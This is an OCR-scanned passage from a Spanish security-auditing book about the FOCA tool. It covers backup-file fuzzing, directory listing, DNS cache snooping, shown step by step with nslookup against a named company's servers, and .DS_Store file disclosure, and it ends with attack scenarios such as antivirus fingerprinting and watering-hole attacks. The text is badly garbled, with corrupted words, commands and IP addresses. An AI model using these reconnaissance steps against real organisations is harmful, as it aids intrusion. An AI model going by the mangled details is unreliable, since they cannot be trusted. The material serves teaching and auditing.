sin  deseargar  ni  analizar  ni  un  solo  documento  publico  en  Internet  es  decir,  todos  los  datos  de  los 
servidores,  dominios,  subdominios  y  roles  se  han  oh  ten  i  do  exciusivamente  mediante  las  teenicas  de 
descubrimiento  de  la  red  deseritas  en  este  capitulo  y  sin  utilizar  los  metadatas  que  pudiera  haber 
ocultos  en  los  documemos. 
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Sin  embargo,  en  el  caso  de  que  se  estuviera  realizando  un  test  de  intrusion  real,  es  evidente  que 
el  auditor  tambien  trataria  de  localizar  todos  los  doeumentos  publicados  en  I  os  silios  web  de  la 
compania  y  procederia  a  su  descarga  para  analizar  sus  metadatas ,  tal  y  como  se  explieo  en  el  eapitulo 
anterior,  y  usando  la  opcion  “ Analize  Metadata',  FOCA  combi  naria  toda  la  informaeion  obtenida 
mediante  el  anal i  sis  de  metadatas  y  el  analisis  de  red. 

De  esla  forma  el  programa  trataria  de  reconocer  que  doeumentos  han  side  ereados  desde  el  mismo 
equipo  y  que  servidores  y  clientes  se  pueden  inferir  de  ellos,  e  intentaria  obtener  al  mismo  tlempo 
informaeion  sobre  las  ACLs  de  la  red,  informaeion  que  podria  resultar  fundamental  en  fases 
posteriores  para  el  exito  de  la  auditoria. 

Conclusiones  finales  del  Network  Discovery 

A  pesar  de  que  FOCA  es  una  herramienta  muy  popular  por  sus  funciones  de  analisis  eentradas 
puramente  en  los  metadatas,  como  se  ha  visto,  desde  la  version  2  de  la  herramienta  !a  utilidad  ha 
cambiado  su  enfoque  para  poder  ser  mueho  mas  efectiva  euando  de  analizar  un  dominio  completo 
se  trata. 

La  fase  de  analisis  de  metadatas  es  recomen  dab  le  hacerla  mas  ad  el  ante  y  comenzar  el  proceso  tal 
y  como  se  ve  ahora,  por  el  descubrimiento  de  red,  para  volver  recursivamente  a  analizar  todos  los 
doeumentos  y  sacar  mas  informaeion  aim, 

En  el  siguiente  eapitulo  vamos  a  ver  las  ultimas  opciones  que  se  anadieroti  a  FOCA  para  encotitrar 
vulnerabilidades  y  hacer  mueho  mas  send  llo  el  proceso  de  auditoria  de  seguridad  a  un  anal  ista,  pero 
tambien  veremos  en  otro  eapitulo  como  utilizar  la  herramienta  para  saear  su  maximo  rendimiento  en 
diferentes  entornos  coneretos  de  auditoria. 
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Busqueda  de  vulnerabilidades 


l.Tipos  de  vulnerabilidades  analizadas  por  FOCA 

A  partir  de  la  version  3.x,  FOCA  incorpora  una  gran  cantidad  de  funcionalidades  para  la  busqueda 
automatica  de  vulnerabilidades  en  los  servidores  del  dominio  auditado  con  el  objetivo  de  hacer  mas 
facil  la  labor  del  auditor  de  seguridad. 

A  lo  largo  de  este  capitulo  se  van  a  esludiar  los  tipos  de  vulnerabilidades  que  FOCA  es  capaz 
de  descubrir  en  sistemas  localizados,  explicando  como  funciona  cada  tecnica  y  mostrando  las 
eonsecuencias  tras  la  explotacion  de  las  mismas  que  pueden  presentar  los  servidores  vulnerable s. 


Backups 

Una  de  las  opciones  primeras  que  se  anadio  a  FOCA  es  la  busqueda  de  los  backups  de  una  parte  o 
del  total  de  los  fieheros  de  la  web .  Esto  es  algo  muy  comun  en  muehas  auditorias  de  seguridad  y 
consiste  en  encontrarse  que  la  copia  de  seguridad  de  un  directorio  ha  side  creada  directamente  en  el 
servidor  de  fieheros  del  servidor  web.  Esto  no  deberia  realizarse  nunca,  pert)  si  damos  con  un  fichero 
que  contenga  toda  la  copia,  entonces  podremos  descargar  el  codigo  fuente  y  encontrar  infomiacion 
importante  para  la  seguridad  del  sitio. 

La  idea  que  aprovecha  esta  vulnerabilidad  utilizada  en  FOCA  es  que  muehas  veces,  en  un  directorio 
como  HTTP:! iwww.sever.com/carpetal/carpeta2,  se  produce  una  copia  de  seguridad  de  carpeta2 
que  se  hace  directamente  desde  carpetal . 

Asi  se  puede  encontrar  un  fichero  que  sera  HTTP'J iwww.server.com/carpeial /carpetal rzip  o  Jgz  o 
,rat\  etcetera  directamente  publicado  en  el  servidor.  Esto  se  debe  a  que  el  administrador  abusa  de  la 
posibilidad  de  hacer  una  carp  eta  comprimida  directamente  con  las  opciones  del  menu  contextual  de 
su  explorador  de  archivos. 

Para  localizar  las  copias  de  seguridad  de  fieheros  y  carpetas,  FOCA  permite  seleccionar  las  URLs 
descLibiertas,  en  donde  se  quiere  inspeecionar  en  busca  de  copias  de  seguridad.  La  herramienta 
genera  todos  los  posibles  lichcTOs  de  backup  con  el  Fuzzer  (pro  ban  do  extensiones  como  .zip,  jgz , 
.rar,  .old, . bek ,  .L  etcetera). 
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Como  se  puede  ver  en  la  imagen  04.01 ,  FOCA  buscara  resultados  que  devuelvan  codigos  dc  servidor 
200  y  eliminara  los  codigos  de  respuesta  que  se  indiquen  en  el  panel  de  control  separados  por  comas, 
con  el  objetivo  de  reducir  al  maximo  los  talsos  positivos*  Aun  a$i5  podna  ser  que  se  obtenga  un 
valor  OK  200 ,  pero  realmente  sea  una  pagina  de  tratamiento  de  errores  generado.  Hay  que  revisar 
manualmente  los  resultados. 


Para  hacersc  una  idea  del  numero  de  admin  istradores  que  Henen  esta  mala  praxis,  se  invita  al  lector 
a  realizar  una  busqueda  de  ficheros  .old,  por  ejemplo,  en  su  buscador  favorito  usando  el  operador 
ext  \old. 


Q  HTTP 


j  Configuration 


r 


Ch 


Hide  codes  301 .302.404.500 


Jisbng 
.DS_Store 
1  _27bfDwn_ 

1_27brown. 
12 /brown  _ 
1_27brown_ 
1_27brown_ 
1_27browr\ 
1_2^3rown 

1  _2^xown_ 
1  _27browna 
1_27brown. 
1_27brawn_ 
_27brawn, 
^^brawn. 
_21brorwn 
1 2 /brown 


bra.doc.dd 
.bio  .odd 
bio  doc  bak 
bio  bak 
bio  doc  back 
bro  back 
bio  doc  1 
_b*o.1 
bio  doc  2 
_bio. 2 
bta.dcc.txt 
_bk)b4 
_bio  doc^ 
bio  1  doc 
bio2.doc 
bto_1  .doc 
bio 2.doc 


http 
httpy/www 
http/ 
http:/ 
http  J 
http:/ 
http:/ 
http  ://www 
http:/ 
http:/ 
http:/ 
http:/ 
http://www 
httpy/www 


Imagen  04,0 1 :  Bu  scan  do  ficheros  dc  backup  con  HTTP  Fuzzer , 


Debido  al  alto  consume  de  tiempo  y  recursos,  esta  opcion  de  busqueda  de  backups  en  los  servidores 
web  no  esta  activada  por  defecto,  y  debe  ser  lanzada  de  forma  manual  euando  se  esta  realizando  una 
revision  concrela  de  un  servidor  web . 

Hay  que  ir  al  nodo  del  servidor  web,  y  acceder  a  la  informal  on  de  las  URLs  local  izadas  dentro  de 
ese  servidor.  Una  vez  allu  se  podra  utilizar  la  opcion  desde  el  menu  contextual  que  aparece  con  el 
boton  derecho  con  el  titulo  ''Search  Backups”  sobre  una  o  varias  URLs,  dependiendo  del  numero  de 
ellas  que  hay  an  side  seleccionadas  previamente. 

Cuando  se  ha  seleccionado  esa  opcion,  aparecera  el  panel  de  control  que  se  ve  en  la  imagen,  las 
URLs  solicitadas  en  busca  de  diferentes  backups  y  los  resultados  se  veran  en  la  pestana  de  Results , 
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Listado  de  directorios 

El  listado  de  directorios  es  una  de  las  vulnerahilidades  que,  a  pesar  de  poder  no  parecer  demasiado 
grave,  son  mas  utilizadas  y  dan  mejores  resultados  en  un  proceso  de  auditoria.  El  poder  ver  que 
archivos  hay  en  una  determinada  carpeta  pemiite  acceder  a  algunos  documentor  quo  el  administrador 
del  sitio  web,  o  la  propia  aplicacion  web ,  hayan  podido  dejar  pensando  quo  nadie  va  a  acceder  a  ellos 
porque  no  se  conoce  su  n ombre. 

Si  en  un  directorio  de  un  servidor  web  se  tienen  almaeenados  una  serie  de  archivos  y  e!  directorio 
carece  de  un  fichero  que  deba  ser  mostrado  cuando  un  cliente  solicita  esa  carpeta  direetamente,  por 
defecto  muchos  servidores  web  muestran  un  listado  de  los  archivos  guar  dados  en  el  directorio. 


C?  O  mailj 

Index  of  /pipermail 

Name  Last  modified  Size  Description 

Parent  Director 

- 

I  j  express -users. 

29- Oct-2010  12:38  - 

Q  &amework-dec- 

24-Nov-2009  06:37  - 

1 

i 

£ 

45 

0 

09-Feb-2008  23:33 

framework:' 

23-May-2012 19-27  - 

Pi  nexpose-nseiV 

16-Jun-201 1  00:01 

Pl  warvox. 

08 -May-2009  22:38 

Imagen  04.02:  Listado  de  directorios  activo  en  un  servidor  web. 


Por  defecto,  los  serv  idores  Microsoft  IIS  tienen  capado  el  listado  de  directorios  en  todas  las  carpetas, 
pero  en  los  servidores  Apache  depende  mas  del  administrador,  que  debe  configurar  o  bien  un  archivo 
Index  o  bien  que  se  prohiba  directamente  el  aeceso.  En  cl  caso  dc  Apache  se  deberia  configurar  en  el 
archivo  hitpd.Qowf  una  directiva  con  OPTIONS  none  que  prohiba  sli  listado  dc  ficheros.  Algo  como 
la  siguiente  configuracion  para  el  directorio  /: 

-  [Directory  /] 

-  Order  Deny,  Allow 

-  Deny  from  all 

-  OPTIONS  None 
[/Directory] 

Para  local  izar  eslos  directorios  abiertos,  como  se  puede  ver  en  la  Figura  04.03,  en  las  opciones  de 
FOCA  sc  puede  personal izar  la  busqueda  de  rutas  que  perm i ten  listado  de  directorios,  de  forma  que 
usando  el  caracter  c|’  se  pueden  anadir  multiples  patrones  para  reconocer  esta  Vulnerabilidad.  Por 
defecto  sc  buscan  paginas  con  el  contenido  Index  of!  y  paginas  con  el  valor  To  Parent  Directoyr< / 
a><hr>t  pero  se  pueden  personal  izar  con  cualquier  otro  valor  que  aparezea  en  paginas  de  listados. 
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Imagen  04.03:  Persona  lizando  la  busqueda  de  mtas  con  listado  de  dircctorios. 

Asi,  si  se  estuviera  tratando  de  localizar  un  servidor  SharePoint  con  listado  de  directories  abierto, 
podrian  usarse  algunos  de  los  patrones,  corao  “ ail  site  contents  de  un  diccionario  especialmente 
creado  para  esta  tecnologia,  llamado  GoogleDiggity\  que  incluye  121  expresiones  regulares  que 
permiten  al  usuario  localizar  cienos  recursos  en  sitios  SharePoint  como  paginas  administrativas, 
servicios  web,  galenas  de  imageries,  etcetera,  que  los  administradores  han  dejado  accesibles  por 
error. 

Busqueda  de  malware  y  BlaekSEO  con  patrones  de  Directory  Listing 

La  utilizacion  de  los  patrones  de  busqueda  se  puede  configurar  no  solo  para  localizar  listados  de 
directorios  abiertos,  sino  tambien  para  encontrar  resultados  concretes,  como  paginas  con  login, 
sitios  que  han  si  do  comprometidos  por  algun  tipo  de  malware  o  con  campanas  de  spam  y  BlaekSEO 
y  que  incluyen  enlaces  a  otras  web  para  subir  su  page  rank  o  sitios  in  fee  tad  os  por  un  determinado 
eodigo  de  un  kit  de  explotacion,  por  ejemplo. 


1  HTTP:/tw ww,  stach  I  \  u  .com/d  icti  o  nari  e  s/SharePoi nt%2  0GoogIe%2  GQu  eri  es%2Q-%  20 1 8M  A  R  2  0 1 2  .txt 
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Supongamos  que,  tal  y  como  le  paso  a  Apple  en  los  afios  2010  y  2011,  cuando  algunos  de  sus 
servidores  frier  on  comprometidos  y  las  paginas  de  i tunes  Servian  scripts  que  distribuian  malware  y 
un  rogue  A  V,  un  pen  tester  ha  descubierto  en  Lina  web  un  codigo  Javascript  ofuseado  de  un  kit  de 
explotacion  y  quiere  conocer  en  que  otros  sitios  del  dominio  objetivo  se  encuentra  instalado  ese 
mismo  kit.  Utilizando  las  opciones  de  configuraeion  de  FOCA  podrian  local izarse  de  forma  sene  ilia 
y  rapida  todos  los  servidores  en  los  que  se  encuentre  el  patron  buscado. 

O,  tal  y  como  le  ocurrio  a  I  Teatro  Real  espahol  en  el  afio  2009,  cuyos  servidores  web  habian  sido 
comprometidos  aprovechando  una  inyeccion  de  SQL  y  se  habian  inemstado  miles  de  enlaces  a 
paginas  de  todo  tipo,  incluyendo  la  venta  de  viagra,  que  no  eran  mostradas  al  visual izar  la  pagina  web 
(ya  que  aparecian  en  el  codigo  con  un  estilo  no  imprimible)  pero  que  si  aparecian  en  los  resultados 
de  busqueda  de  Google  o  Bing,  por  lo  que  se  estaban  utilizando  para  aumentar  el  pagerank  de  los 
sitios  enlazados. 

De  nuevo,  personal!  zando  el  patron  de  busqueda  de  FOCA  resultaria  muy  sencillo  encontrar 
servidores  comprometidos  en  el  dominio  analizado  que  contengan  este  tipo  de  enlaees  a  sitios  no 
d  ese  ados. 


DNS  Cache  Snooping 

Otra  de  las  vulnerahilidades  que  busca  FOCA  es  la  de  servidores  DNS  que  tienen  configurado  un 
sistema  de  Cache y  lo  que  puede  ser  una  fuga  de  informacion  muy  importante  para  una  organ izaci on. 
Cada  vez  que  un  usuario  quiere  resolver  un  n ombre  de  dominio,  este  pregunta  al  servidor  DNS  que 
dene  configurado.  Si  el  servidor  tiene  aetivada  la  Cache ,  entonces,  antes  de  soli  ei  tar  la  resolucion 
por  medio  de  un  sistema  de  consultas  recurs ivas,  mira  primero  si  tiene  una  resolucion  no  caducada 
de  ese  nombre  en  su  Cache. 

Si  tiene  la  resolucion  en  la  Cache ,  sirve  esa  respuesta. 

Si  no  la  tiene,  entonces  comienza  el  sistema  de  resolucion  DNS  recursiva  y,  una  vez 
re  sue  1  to,  almacena  en  la  Cache  el  resultado. 

Conociendo  este  funcionamiento,  si  alguien  quiere  saber  si  se  ha  resuelto  previamente  un  determ  inado 
dominio,  bast#  con  configurar  las  consultas  al  servidor  DNS  anulando  la  resolucion  recursiva.  Es 
decir,  e!  serv  idor  DNS  respondent  consultando  tan  solo  su  Cache.  Si  ese  nombre  se  ha  pedido  en 
un  tiempo  reciente  se  obtendra  la  resolucion,  mienlras  que  si  no  se  ha  solid  tado  se  obtendra  una 
respuesta  negativa  de  resolucion. 

Para  comprender  mejor  el  funcionamiento  de  esta  tecnica  se  va  a  mostrar  un  ejemplo  realizado  de 
forma  manual  paso  a  paso  usando  tan  solo  la  herramienta  ns  lookup  que  permite  hacer  consultas  a 
servidores  DNS  y  que  existe  tanto  en  los  sistemas  Microsoft  Windows ,  como  *N1X*  como  en  los 
Mac  OS  X.  En  este  ejemplo,  se  va  a  usar  para  tratar  de  obtener  informacion  de  los  sitios  visitados 
por  los  usuarios  del  servidor  de  n  ombres  de  una  organ  izaci  on  que  tiene  aetivada  la  Cache  de  DNS 
en  sus  servidores- 
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En  este  ejemplo  como  primer  hi  to  hemos  de  loealizar  los  servidores  DNS  de  la  organ  izac ion,  Para 
ello,  el  primer  paso  consiste  en  mod  ill  car  el  tipo  de  regislros  de  la  eonsulta  que  vamos  a  lanzar 
a  nuestro  servidor  DNS  con  el  comando  set  type=m.  Esto  nos  permite  realizar  una  peticion  para 
cualquier  dominio,  con  el  objetivo  de  obtener  la  lista  de  todos  los  servidores  de  nombres  autorizados 
para  este  dominio. 


-ns  lookup 

>  set  type^ns 

>  renfexom 

Non-authoritative  answer: 

renfexom 

names-erver  =  d  ns  1  xenfe.es. 

renfexom 

nameserver  ~  dns2jretifees. 

renfexom 

nameserver  =  ml  xenfe.es. 

renfexom 

nameserver  =  ns2xenfe.es. 

Authoritative  answers  can  be  found  from : 

nslxenfe.es 

internet  address  =  213. 144. 3 3. 2 54 

dnsl  xenfe.es 

internet  a  ddress  =  2 1 3 . 1 44 .4 9 .3  5 

[magen  04,04;  Local  izando  los  sen  id  ores  de  nombres  de  rcnfe. 


A  continuacion  se  debe  indicar  a  la  herramienta  que  a  partir  de  este  ni  omen  to  se  quiere  que  las 
consultas  se  realicen  envianciolas  a  I  servidor  DNS  de  la  organizacion,  utilizando  para  ello  la  orden 
sender  ns  I ,  rcnfe.  es . 

Una  vez  conectados  al  serv  idor  de  la  organ izaeion,  es  momento  de  ver  si  tiene  activada  la  cache  o  no 
en  sus  servieios  DNS,  para  lo  que  se  modifiea  de  nuevo  el  tipo  de  registros  consultados  (set  type-a) 
para  que  nos  devuelva  las  direeeiones  IP  asociadas  a  los  nombres  y  se  indica  al  servidor  que  las 
consullas  se  resuelvan  de  forma  no  recursiva  (set  no  recurse)  para  que  tan  solo  con  suite  su  Cache  y 
no  pregunte  de  forma  recursiva  a  otros  servidores  DNS . 


>  strvtr  nsLrenfe.com 

Default  server:  ns  1  renfe.com 
Address:  2 13. 144.3 3 .254*5  3 

>  set  type^a 

^  set  norecnjrse 


Imogen  04,05;  Establedendo  la  biisqueda  como  no  recursiva. 
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A  parti  r  de  ese  momenta,  corno  el  servidor  de  nombres  solamente  consultara  su  memoria  Cache  y  no 
realizara  consultas  recurs  ivas,  tan  solo  podra  resolver  aquellos  registros  que  hay  an  side  consultados 
previamente  por  otros  usuarios  del  mismo  servidor  DNS . 

Como  puede  verse  en  la  siguientc  imagen,  cuando  se  soliciia  una  direccion  que  habla  side  pedida 
previamente  por  alguno  de  los  c  I  i  entes  de  este  servidor  DNS ,  se  obtiene  la  direccion  IP.  En  este 
caso  la  direccion  de  www.elpais.com.  Sin  embargo,  cuando  se  realiza  una  peticion  de  resolution  de 
un  registro  del  que  no  hay  information  en  la  Cache,  el  servidor  DNS  contesta  con  la  direccion  del 
servidor  DNS  al  que  habria  que  preguntar  para  obtener  dicho  valor.  Eso  quiere  decir  que,  en  este 
caso,  ningun  cliente  babia  pedido  la  resolution  de  www.elladodelmal.com 

>  www*  dp  ais.com 

Server:  m  1  renfe  com 

Address:  213.144J3J254#53 

Non-authoxitath^  answer: 

www. elpms  .com  canonical  na me  =  dpaas  ,e$  edges  uite.  net. 

elpais .  es .  edges  urte.net  canonical  name  =  al  749 .g.  akamaa.net 

>  wirw.eBadodelmalconi 

Server:  nsl  .renfe.com 

Address:  213  144J3.254#53 

Non-anthontative  answer: 

***  Cant  find  vv^vw  elladodeimaL  com :  No  answer 

Imagen  04,06:  DA'S'  Cache  Snooping  en  el  DNS  de  Renfe, 


FOCA  incorpora  dos  medidas  concretas  para  las  tecnieas  de  DNS  Cache  Snooping.  La  primera 
de  el  las  es  un  si  sterna  de  deteccion  de  la  Cache  activa  en  los  servidores  DNS  por  medio  de  una 
sencilla  prueba.  Para  todos  los  serv  idores  DNS,  FOCA  ednfigura  las  consultas  como  no  recurse  y 
pide  resolver  la  direccion  IF  de  www. Google, com  porque  es  el  que  mas  probabilidades  tiene  de  estar 
caeheado.  No  obstante,  si  se  quiere  cambiar  esta  prueba,  en  las  opciones  de  FOCA,  dentro  de  la 
configuration  de  DNS  Cache  Snooping  se  permite  cambiar  el  registro  a  utiiizar  para  esta  deteccion. 

La  segunda  medlda  es  una  herramienta  que  permite  explotar  la  consulta  de  registros  en  la  Cache  de 
un  servidor  DNS  de  forma  automation.  Para  ello,  se  localizan  Los  servidores  de  nombres  del  dominio 
deseado  en  los  que  se  encuentra  activada  la  Cache  y  se  carga  un  fichero  con  la  lista  de  dominios  que 
se  quieren  monitorizar 

A  continuation  se  selection  a  cl  servidor  DNS  a  consultar  y  se  lanza  el  ataque,  de  forma  que  los 
dominios  del  diccionario  que  ban  side  visitados  se  mostraran  en  la  ventana  de  Cache.  Y  para  evitar 
problemas  por  la  caducidad  de  la  Cache,  FOCA  permite  la  option  de  monitorizar  en  t tempo  real  con 
act u al  i  zac  i  on  es  c  o  n  stan  te  s . 
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Domain  renfe  .es 


File 

Dna 


Cache 


Monftor 


-4  Obtain  DNS  severe 


C:\U3er3\iC4\0pp  Dat  a\Local\Apps\2,0\lJG  A1 GCMW.3TW\LBE5TQYE  ,ZOM\foca  tion  e 


dns  1  .rente  es 
dns2jBnfe.es 
ns2jnerrfe.es 


Host 

Default 

WWW  facebook  com 
facebookcom 
twitter  com 
update  jnicrosoft  com 
www  penodistadigitat  com 
eUadodetmal  blogspot  com 
www  jnform  atica64.com 
megaupload  com 


-fr  Snoop  DNS 


Monttorice  each  60  seconds 


Host 

First 

La;st 

www  Jacebook  com 

15:55 

15:55 

facebook.com 

15:55 

15:55 

twitter  com 

15:55 

15:55 

update  microsoft  com 

15:55 

15:55 

www  .periodist  adigital  com 

15:55 

15:55 

dtadoddknal  blogspot  com 

15:55 

15:55 

www,infocmatica64  com 

15:55 

15:55 

megaupload  com 

15:55 

15:55 

Imagen  04,07:  DNS  Cache  Snooping  con  FOCA . 


Escenarios  de  ataque  aprovechando  DNS  Cache  Snooping 

Aunque  parezca  un  pequefio  leak  de  informacion,  existen  escenarios  para  vulnerar  la  seguridad  de 
una  organizacion  por  medio  de  estas  tecnicas.  A  continuacion  va  una  lista  de  posibles  escenarios  de 
ataques,  algunos  de  ellos  se  expliearan  en  detalle  mas  adelante. 

-  Es  posibie  conocer  el  software  utilizado  en  I  os  equipos  intemos  de  una  organizacion.  Por 
tan  to,  se  podria  descubrir,  por  ejemplo,  si  se  estan  utilizando  equipos  eon  sistemas  Microsoft 
Windows,  al  eonectarse  a  Windows  Update,  o  si  se  usa  una  determ  in  ad  a  aplicacion  eomo 
Gtalk,  o  software  mucho  mas  concreto. 

Podria  utilizarse  Iambi  en  para  detectar  software  vulnerable  a  determinados  ataques,  como 
por  ejemplo  a  un  ataque  de  Evilgrade  para  inyectar  actualizaciones  falsas,  tal  y  como  se 
explica  en  el  capitulo  5. 
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“  Se  podria  conocer  la  marca  concreta  de  antivirus  que  esta  siendo  utilizado  en  los  sistemas 
informaticos  de  la  organizacion  mediante  la  consulta  de  los  dominios  que  util iza  cada  uno  de 
ellos  para  actual izar  la  base  de  datos  de  firmas.  Esto  permitirla  que  un  ataeantc  tuviera  toda  la 
informacion  neeesaria  para  poder  crear  un  malware  que,  en  el  momenta  en  que  se  ejecutase 
dentro  de  la  red,  no  fuera  detectado,  ya  que  se  puede  saltar  un  detenu inado  antimalware 
ereando  una  muestra  especialmente  ereada  para  el* 

-  Esto  podria  servir,  por  ejemplo,  para  detectar  si  existen  versiones  de  software  no 
licenciado  para  una  empresa  que  estan  siendo  utilizadas  dentro  de  la  red,  lo  que  podria  llevar 
a  un  fabric  ante  de  software  a  pedir  una  auditoria  de  liceneias. 

-  Por  ultimo,  por  dtar  solo  algunos  de  los  entomos  en  que  se  podrlan  utilizar  estas 
tecnicas,  hay  que  hablar  de  los  Wareting  Hole  Attacks.  Es  decir,  si  conocemos  silios  vis  i  tad  os 
habitualmente  por  miembros  de  la  organizacion,  se  podria  atacar  un  sitio  web  legitimo  que 
sea  visitado  habitualmente  eon  un  exploit  disefiado  para  aprovechar  las  vulnerabil  idades  de 
los  navegadores  descubiertos  que  vengan  desde  la  organizacion,  de  forma  que,  al  visitar 
esta  web  modificada,  los  equipos  de  los  clientes  fueran  eomprometidos  con  un  malware 
especialmente  creado  para  no  ser  detectado  por  el  sistema  antimalware  usado  en  la  empresa. 

Esta  tecnica  podria  haber  sido  utilizada  por  los  atacantes  chinos  que  iograron  comprometer  los 
servidores  del  New  York  Times  durante  el  mes  de  cnero  de  2013.  Segun  la  version  del  propio  diario, 
el  ataque  coincidid  en  el  tiempo  con  la  publicacion  de  un  reportaje  sobre  los  multi  millenaries 
beneficios  que  familiares  del  primer  ministro  chino  habrian  eslado  obteniendo. 

De  acuerdo  con  esta  misma  version,  los  atacantes  habrian  conseguido  instalar  45  piezas  de  malware 
en  diferentes  equipos,  a  pesar  de  que  el  periodico  cuenta  con  una  solucion  dc  antivirus  de  la  companla 
Symantec.  Sin  embargo,  parece  que  el  malware  instalado  en  sus  orden  adores  habia  si  do  modificado 
de  manera  que  su  antivirus  no  pudiera  detectarlos,  evadiendo  as!  esta  proteecion,  por  lo  que  parece 
que  los  atacantes  conocian  la  solucion  antimalware  que  el  periodico  estaba  utilizando. 

Como  ultima  reseha  sobre  las  tecnicas  de  DNS  Cache  Snooping ,  hay  que  decir  que  en  un  estudio 
realizado  sobre  un  servidor  jDMS  de  una  gran  compahia  se  pudieron  obtener  datos  de  inteligencia  que 
iban  mas  alia  de  lo  es  per  ado* 

Analizando  un  serv  idor  DNS  con  Cache  activada  durante  un  mes  dc  tiempo  con  una  base  de  datos  de 
cientos  de  dominios,  se  podia  llegar  a  ver  que  tendencia  ideologica  tenia  el  personal  de  la  empresa 
por  el  tipo  de  periodteos  que  consultaban.  Se  pudo  llegar  a  detectar  que  sitios  eran  visitados  mas  por 
la  manana,  mas  por  la  tarde,  y  mas  por  la  noche,  lo  que  had a  suponer  que  tipo  de  personal  estaba 
trabajando  a  determ  inadas  boras,  ya  que  los  cambios  eran  por  conjuntos  totaimente  disjuntos  de 
dominios. 

Al  final,  cualquier  pequeha  fuga  de  informacion,  estudiada  al  detalie  y  cruzada  con  el  resto  de 
informacion  obtenida  puede  ser  una  fuente  inacabable  de  posibilidades  como  io  es  la  Cache  del 
DNS. 
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Ficheros  .DS  Store 

FOCA  tambien  es  capaz  de  localizar  ficheros  .DS  Store,  unos  archives  que  son  creados  de  forma 
automatica  cuando  e!  sistema  de  archivos  es  manipulado  desde  un  equipo  con  Mac  OS  X  y  que  son 
simi  lares  a  los  archivos  Thumbs  Ab  en  sistemas  Microsoft  Windows. 

Los  ficheros  .DS  Store  son  los  encargados  de  almaeenar  los  metadatas  que  indican  como  debe 
ser  abierto  el  directorio  cn  el  que  esta  contenido.  Estos  metadatas  hacen  referencia  al  tamafio  de 
la  ventana,  modo  de  visual  izacion,  tamafio  de  los  iconos,  etcetera.  For  cste  motive  resultan  muy 
interesantes  para  preparar  una  auditoria  web,  ya  que  pueden  proporcionar  informacion  sobre  los 
nombres  de  los  ficheros  de  determinado  directorio  y  es  posible  descubrir  ficheros  de  backup ,  de 
configuration  o  earpetas  con  informacion  jugosa  que  pueda  ayudar  al  pentester  a  encontrar  un  fallo 
en  el  sitio  web. 


Como  puedc  verse  en  la  figura  04.08,  es  posible  encontrar  este  tipo  de  ficheros  en  sitios  tan 
inesperados  como  las  webs  del  FBI,  aunque  otros  grandes  como  Google ,  o  el  propio  Apple,  tambien 
han  publicado  estos  archivos  en  sus  sitios  web.  Para  hacer  este  sencillo  experimento  se  ha  usado  el 
comando  ext:  que  busca  ficheros  con  una  determ  inada  extension,  y  poniendo  DS  Store  como  tab 


Google 


ext:DSJ>tore  site:gov 

Apro«imat±anwt»  14  nosoltados  (0.19  fisgunjosji 


(\  Todo 
0  Imagines 
m  Videos 
S  Noticias 
Shopping 
Mas 


►  DS  Store  -  FBI 

www.f  bi  .gov/aboutHiS/history/.  ds^storo 

Formato  de  archive  Desconocido  -  Versibn  an  HTML 

udl “Feupdate.ja Nocblob***  ****  *(§*0**"““* 

*®***Ei**DSDB**  *■  L . *@*£*™« — 

*Bud  1  ***%*********  *@‘0**** *******  ... 

www.  fbi .  gov/about-usy  history /imagw  images/letterer ,  DS  J3tore 
Formato  de  archive:  Desconoddo  -  VorsnSn  an  HTML 

*£*g~™**  *@*g^™*—  *@*“E%“DSDB" 


Bus  car  cerca  de... 

Ublcadon 

Estabh&obr 


La  Web 

PA^nas  en  espafid 
Parras  de  Espaha 
P^ginas  extranjeras 
traducictas 


"fare******"***  *@*C  m 

www.f  bi  .gov/aboul-us/his  tocy/history  'thaatar/.ds_s  tore 
Formato  de  archive.  Desconoddo  -  Versidn  en  HTML 

*Bud1  ***%  *********  *@*g***™»  *@*£****minW  ^ . .  *@*  “E  %  “OS  Dfi ** 

\ . *§VM . “ 

!Su(jl"w"""v(iai71"henrv021711.jDoditcblQbl"henrv021711a... 

www.  fbi  gKJv/news/stories/201 1  /fabru  ary/hcf_takedqvm ,  J.  dsstora 
Formato  de  archive  Desconocido  -  Version  en  HTML 

1 7  Feb  2011  -  "Bud  1  *********“y021 71  “henry021 711  jpgdrtcbtob  *  -3  ^  *honry02l  711a. 
jpgdilobiob  * J  ^  *hemy02l7l1b  )P9diicbiob  ... 


M£s  herTamientas 


*Budt***%' 


■  ’@*p* 


www.  fbi  .gov/f  Lm-games/kids/kids_day_videofi/.d3_store 
Formato  de  archive;  Desconocido  -  Verskkf  en  HTML 
*Bud1  “*%*“**“"  *®*£*«™“  'r@*C""*****“  “@*g****“« 


*(§t*#*E  %  “DS  DB  *' 


Imager  04.08:  Ficheros  - DS  Store  en  sitios  web  .gov. 
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Para  poder  visualizar  el  contenido  de  este  tipo  de  archivos  es  necesario  convertir  e!  fichero  de  UTF- 
16  a  LtfF-8,  ya  que  los  nombres  de  los  archivos  se  almacenan  en  UTFA6.  Tras  esta  conversion  se 
puede  utilizar  el  comando  string,  que  busca  cadenas  de  texto  imprimibles  en  ficheros  binaries,  para 
extraer  los  nombres  de  ficheros  que  contenga,  tal  y  eomo  se  mueslra  en  la  imagen  04.09,  En  ese 
ejemplo  se  puede  ver  eomo  ha  aparecido  un  fichero  con  extension  .fla  que  contiene  el  codigo  fuente 
de  un  prograrna  escrito  en  Adobe  Flash. 

flacBook-Air-de-thema: Downloads  ChemaS  iconv  -f  UTF-16  to  UTF-8  D5_Store  (strings 

iconv:  to;  No  such  file  or  directory 

iconv:  UTF-8:  No  such  file  or  directory 

contactos 

contactos 

contactos 

galeria 

galeria 

galeri a 

home_eng,html 

lib  ro 

newsletter 
princi  pal 
pri nci pal . fla 
principal,  fla 
principal,  swf 
refs 
refs 

I .  -  .  . _ _  i  >  ■ - 

Imagen  04.09:  Contenido  de  un  fichero  . DS_Store . 

Para  no  tener  que  realizar  la  conversion  de  formato  y  la  extraccidn  de  strings  de  forma  manual, 
se  pueden  utilizar  herramientas  que  automatizan  el  proceso  y  que  permiten  incluir  en  un  script  el 
anal  i  sis  de  estos  archivos.  File  Disclosure  Browser2  es  una  aplicacion  escrita  en  Perl  que,  dado  un 
fichero  DSStore  y  una  Url  base,  genera  URLs  a  todos  los  ficheros  que  aparecen  intemamente  en 
el  archive. 

De  hecho,  eomo  eonjunto  de  herramientas  accesorias  a  FOCA ,  se  ha  portado  esta  herramienta 
al  ienguaje  C#  y  a  Java  para  que  pueda  ser  utilizada  conjunfamente  con  FOCA  y  se  encuentra 
disponible  para  descarga  publiea  en  el  repositorio  de  SourceForge  con  el  nombre  de  iDStore3 . 

